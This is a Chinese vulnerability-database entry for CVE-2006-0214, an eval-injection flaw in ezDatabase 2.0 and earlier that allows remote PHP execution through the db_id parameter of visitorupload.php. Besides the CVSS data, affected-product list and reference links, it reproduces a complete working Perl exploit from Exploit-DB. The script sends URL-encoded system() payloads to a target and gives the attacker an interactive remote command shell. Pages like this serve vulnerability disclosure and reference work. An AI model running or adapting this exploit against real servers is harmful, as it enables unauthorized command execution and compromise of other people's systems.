CVE-2006-0214
CVSS7.5
发布时间 :2006-01-15 06:03:00
修订时间 :2008-09-20 00:45:22
NMCOE    

[原文]Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the db_id parameter to visitorupload.php, as demonstrated using phpinfo and include function calls.


[CNNVD]EZDatabase Eval注入漏洞(CNNVD-200601-153)

        ezDatabase 2.0及更早版本中存在Eval注入漏洞,远程攻击者可以通过visitorupload.php的db_id参数执行任意PHP代码,如使用phpinfo并包含函数调用所示。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:indexcor:ezdatabase:2.1.2
cpe:/a:indexcor:ezdatabase:2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0214
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0214
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-153
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24136
(UNKNOWN)  XF  ezdatabase-visitorupload-file-include(24136)
http://www.securityfocus.com/bid/16237
(UNKNOWN)  BID  16237
http://securityreason.com/securityalert/351
(UNKNOWN)  SREASON  351
http://secunia.com/advisories/18043
(UNKNOWN)  SECUNIA  18043
http://pridels0.blogspot.com/2006/01/ezdatabase-20-and-below.html
(UNKNOWN)  MISC  http://pridels0.blogspot.com/2006/01/ezdatabase-20-and-below.html

- 漏洞信息

EZDatabase Eval注入漏洞
高危 输入验证
2006-01-15 00:00:00 2006-01-16 00:00:00
远程  
        ezDatabase 2.0及更早版本中存在Eval注入漏洞,远程攻击者可以通过visitorupload.php的db_id参数执行任意PHP代码,如使用phpinfo并包含函数调用所示。

- 公告与补丁

        

- 漏洞信息 (1442)

ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit (EDBID:1442)
php webapps
2006-01-22 Verified
0 cijfer
N/A [点击下载]
#!/usr/bin/perl
#
# ezDatabase Remote Command Execution Exploit
# based on advisory by Pridels Team
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# $Id: cijfer-ezdbxpl.pl,v 0.1 2006/01/21 019:22:00 cijfer Exp $

use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

$res  = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
&usage unless $host;

while()
{
	print color("green"), "cijfer\$ ", color("reset");
	chomp($command = <STDIN>);
	exit unless $command;
	if($command =~ m/^http\:\/\/(.*)/g)
	{
		$host="http://".$1;
		print "host changed to '";
		print color("bold"), $host."'\n", color("reset");
	}
	&exploit($command,$host);
}

sub usage
{
	print "ezDatabase Remote Command Execution Exploit\n";
	print "Usage: $0 -hp [OPTION]...\n\n";
	print "  -h --host\tfull address of target (ex. http://www.website.com/directory)\n";
	print "  -p --proxy\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
	print "  -v --verbose\tverbose mode\n\n";
	exit;
}

sub exploit
{
	my($command,$host) = @_;

	$cij=LWP::UserAgent->new() or die;
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
	$cij->proxy("http", "http://".$tunnel."/") unless !$proxy;

	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B";
	$string .= uri_escape(shift);
	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";
	$execut  = "%3C%3F%24%68%61%6E%64%6C%65%3D%70%6F%70%65%6E";
	$execut .= "%5C%28%24%5F%47%45%54%5B%63%69%6A%5D%2C%22%72";
	$execut .= "%22%29%3B%77%68%69%6C%65%28%21%66%65%6F%66%28";
	$execut .= "%24%68%61%6E%64%6C%65%29%29%7B%24%6C%69%6E%65";
	$execut .= "%3D%66%67%65%74%73%28%24%68%61%6E%64%6C%65%29";
	$execut .= "%3B%69%66%28%73%74%72%6C%65%6E%28%24%6C%69%6E";
	$execut .= "%65%29%3E%3D%31%29%7B%65%63%68%6F%22%24%6C%69";
	$execut .= "%6E%65%22%3B%7D%7D%70%63%6C%6F%73%65%28%24%68";
	$execut .= "%61%6E%64%6C%65%29%3B%3F%3E";

	$out=$cij->get($host."/visitorupload.php?db_id=%3b%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%63%6d%64%5d%29&cmd=".$string);

	if($out->is_success)
	{
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}
	if($verbose)
	{
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

# milw0rm.com [2006-01-22]
		

- 漏洞信息

22683
ezDatabase visitorupload.php db_id Variable Arbitrary PHP Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-14 Unknow
2006-01-14 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站